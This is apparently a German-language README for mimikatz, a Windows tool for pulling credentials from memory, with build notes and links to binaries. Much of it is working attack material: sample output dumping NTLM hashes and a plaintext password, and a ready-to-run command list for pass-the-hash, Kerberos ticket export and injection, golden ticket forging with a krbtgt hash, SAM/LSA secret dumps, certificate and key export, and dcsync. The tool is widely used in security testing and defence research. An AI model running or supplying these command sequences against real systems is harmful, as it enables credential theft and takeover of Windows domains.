
Ein kleines Tool zum Spielen mit der Windows-Sicherheit.
mimikatz ist ein Tool, das ich erstellt habe, um C zu lernen und ein paar Experimente mit der Windows-Sicherheit durchzuführen.
Es ist mittlerweile bekannt dafür, Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher zu extrahieren. mimikatz kann auch Pass-the-Hash, Pass-the-Ticket oder Golden Tickets erstellen.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
Aber das ist noch nicht alles! Crypto, Terminal Server, Events, ... viele Informationen im GitHub-Wiki https://github.com/gentilkiwi/mimikatz/wiki oder auf https://blog.gentilkiwi.com (auf Französisch, ja).
Wenn Sie es nicht selbst bauen möchten, sind Binärdateien verfügbar unter https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz liegt in Form einer Visual Studio Solution und eines WinDDK-Treibers vor (optional für Hauptfunktionen), daher sind Voraussetzungen:
mimikatz und mimilib: Visual Studio 2010, 2012 oder 2013 für Desktop (2013 Express für Desktop ist kostenlos und unterstützt x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver, mimilove (und ddk2003-Plattform): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz verwendet SVN zur Quellcodeverwaltung, ist aber jetzt auch mit GIT verfügbar!
Sie können jedes beliebige Tool zum Synchronisieren verwenden, sogar das integrierte GIT in Visual Studio 2013 =)
Build / Build Solution (Sie können die Architektur ändern)mimikatz ist jetzt erstellt und einsatzbereit! (Win32 / x64 sogar ARM64, wenn Sie Glück haben)
MSB3073 bezüglich _build_.cmd und mimidrv. Dies liegt daran, dass der Treiber ohne Windows Driver Kit 7.1 (WinDDK) nicht erstellt werden kann, aber mimikatz und mimilib sind in Ordnung.Mit dieser optionalen MSBuild-Plattform können Sie die WinDDK-Build-Tools und die Standard-Laufzeit msvcrt verwenden (kleinere Binärdateien, keine Abhängigkeiten).
Für diese optionale Plattform sind Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 und Visual Studio 2010 zwingend erforderlich, auch wenn Sie später Visual Studio 2012 oder 2013 verwenden möchten.
Befolgen Sie die Anweisungen:
Das mimikatz-Projekt ist auf AppVeyor verfügbar - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Sein Status ist:
CC BY 4.0-Lizenz - https://creativecommons.org/licenses/by/4.0/
mimikatz braucht Kaffee, um entwickelt zu werden:
gentilkiwi, Sie können mich auf Twitter (@gentilkiwi) oder per E-Mail (benjamin [at] gentilkiwi.com) kontaktieren.lsadump wurden gemeinsam mit Vincent LE TOUX entwickelt. Sie können ihn per E-Mail (vincent.letoux [at] gmail.com) kontaktieren oder seine Website besuchen (http://www.mysmartlogon.com)Dies ist eine persönliche Entwicklung, bitte respektieren Sie ihre Philosophie und verwenden Sie sie nicht für schlechte Dinge!